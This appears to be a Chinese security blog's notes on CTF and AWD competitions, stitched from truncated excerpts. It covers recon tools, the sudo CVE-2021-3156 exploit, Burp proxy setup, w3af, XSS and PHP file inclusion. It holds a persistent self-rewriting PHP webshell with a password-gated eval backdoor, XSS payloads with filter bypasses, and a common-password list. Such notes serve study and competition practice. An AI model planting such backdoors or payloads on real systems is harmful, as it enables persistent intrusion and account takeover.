因为各种事情加上密钥丢失,导致停更最近无事,翻新了一下一切随缘
ping:
ping -c 5 s 2000 192.168.1.3 发送五个大小为2000字节的数据包(ICMP echo请求)
arping -c 5 192.168.1.3 只能本地局域网内运行,无法跨路由器和网关,用于测试是否在线
fping用于同时向多个主机发送ping请求,通过监视目标主机的回复来判断是否可用
fping将尝试向每个目标发送三个ICMP echo包,如果目标不响应则判断为不可达
nbtscan可用于通过扫描ip地址获取目标netbios名字信息的工具,生成包含主机ip,netbios计算机名,可用服务,登录用户名和mac地址的报告
-hv查看运行服务
系统识别:
p0f:
p0f -o /root/p0f.log 把登录信息保存在root/p0f.log下
xprobe2是一个主动的系统识别工具,通过模糊签名匹配,可能性猜测,签名数据库来识别操作系统,终端下输入xprobe2探测目标主机操作系统类型
开源poc:https://github.com/blasty/CVE-2021-3156.git
影响版本:
1 2
Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1
不受影响版本:
1
sudo =>1.9.5p2
可用 sudo –version查看版本
判断方式:sudoedit -s / sudoedit开头报错表示存在CVE-2021-3156漏洞
下载解压
查看可用版本
根据自己靶机系统运行
获得sudo权限
1.迅速使用winscp下载全部站,常见的路径为/var/www/、/app
使用d盾扫描,看一下哪个手快的大佬先行getshell
或者查看最近修改的文件
白嫖大佬在各个靶机里的木马,连接上找flag
2查看当前cms的版本,搜索相关漏洞
3不死马:
12345678910<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__); $file = 'fla2.php';$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; while (1){ <br> file_put_contents($file,$code); system('touch -m -d "2018-12-01 ...
123456
a123456a123456.123456a123456a.123456abc123456abc.abc123456abc123456.woaini1314woaini1314.qq123456qq123456.woaini520woaini520.woaini123woaini123.woaini521woaini521.qazwsxqazwsx.1qaz2wsx1qaz2wsx.1q2w3e4r1q2w3e4r.1q2w3e4r5t1q2w3e4r5t.1q2w3e1q2w3e.qwertyuiopqwertyuiop.zxcvbnmzxcvbnm.123456a123456123456a5201314111111woaini1314qq1234561231230000001qaz2wsx1q2w3e4rqwe1237758521123qwea123123123456aawoaini520woaini1002001314520woaini123123321q123456123456789123456789a5211314asd123a123456789z1234 ...
Burpsuite上层代理功能:
Project Opitons选项下的Connections子选项,勾选Upstream Proxy Server这个板块
“Add”添加代理,这里Destination host是要指定使用代理ip的主机,输入*代表对所有主机使用代理
Proxy host是代理ip,这里我是以clash举例子,所以我写clash的本地IP,如果是其他的HTTP代理ip,就直接填写到这里,
Proxy port就是端口,clash的本地端口是7890,所以我这里写7890,其他HTTP代理ip的端口是啥,就写啥,最后一个选项,选择无就好,点击OK
WGF是一个we应用安全的攻击、审计平台,通过增加插件来对功能进行扩展。这是一款用python写的工具,可以查看所有源代码。支持GUL,也支持命令行模式。
本框架拥有三种类型的插件:漏洞挖掘挖掘(discowe ry)、漏洞分析(aunit)和漏洞攻击(attack)。漏洞挖掘插件只负责一件事情:搜寻新的URL、表单和其它注入点(injection points)。Web spider便是一个经典的漏洞挖掘插件。这个插件以一个URL为输入,然后得到一个或多个注入点。当用户使用多个这种类型的插件时,这些插件会运行这样的循环:如果插件A在第一次运行时发现了一个新的URlL,w3af内核将这个urL传递给插件B。如果插件b发现了一个新的URL,它也将被发送给插件A。这个过程将一直持续下去,所有的插件都将运行工作,占用应用资源,直到无法运行漏洞挖掘应用。
漏洞分析插件则获取那些漏洞挖掘插件找到的注入点,为了发现漏洞,混洞分析插件会向所有可注入点发送特别设计的数据。例如使用一个漏洞分析插件来获取SQL注入的漏洞。漏涓攻击插件的作用是利用分析插件发现的漏洞。它们通常会得到一个远程服务器的shell ...
whois信息
子域名收集
端口信息收集
旁站、C段查询
目录扫描
CMS指纹识别
网站架构
整站分析:服务器系统类型、网站容器(Apache、NGINX、IIS、Tomcat)、脚本类型(jsp、asp、php)、数据库类型(mysql、Oracle、access)
地理位置查询
常用工具:
地理位置查询:
IP查询_专业精准的IP库服务商_IPIP
whois:
kali下的whois
https://www.chinaz.com/
站长之家http://whois.chinaz.com/
域名注册人收集:
https://www.chinaz.com/
子域名爆破:
https://www.zoomeye.org/钟馗之眼
https://chaziyu.com/查子域
域名挖掘机Layer
子域名枚举https://github.com/lijiejie/subDomainsBrute
https://www.52pojie.cn/forum.php?mod=viewthread&tid=894555&highlight=%D7%D3%D3%F2%C3%FB
ssl证书查询:
...
存储型:攻击者在页面上插入XSS代码,服务端将数据存入数据库,当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果。
反射型:攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
dom:攻击者在URL中插入XSS代码,前端页面直接从URL中获取XSS代码并且输出到页面,导致XSS代码的执行,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
alert("trick or treat!")
12/**<script>alert(1)</script> "><a href="javascript:alert(1)">alert</a> <"
大小写
双写
编码
修改type=”hidden”为button
鼠标事件(onclick=alert(1))
浅谈XSS攻击的那些事(附常用绕过姿势) - 知乎 ( ...
include_once()如果该文件中的代码已经被包含了,则不会再次包含
include与require区别:
如果有错误,include会继续执行后面的。require则会停止
highlight_file() 函数对文件进行 PHP 语法高亮显示
PHP里用点拼接
PHP中addslashes函数是把单引号、双引号、反斜杠前添加反斜杠
file://—访问本地文件系统
http://—访问HTTP URL
ftp://—访问FTP URL
php://—访问各种I / O流
zlib://—压缩流
data://—数据(RFC 2397)
glob://—查找匹配模式的路径名
phar://— PHP存档
ssh2://—安全外壳2
rar://— RAR
ogg://—音频流
Expect://—流程交互流
能够打开并包含本地文 ...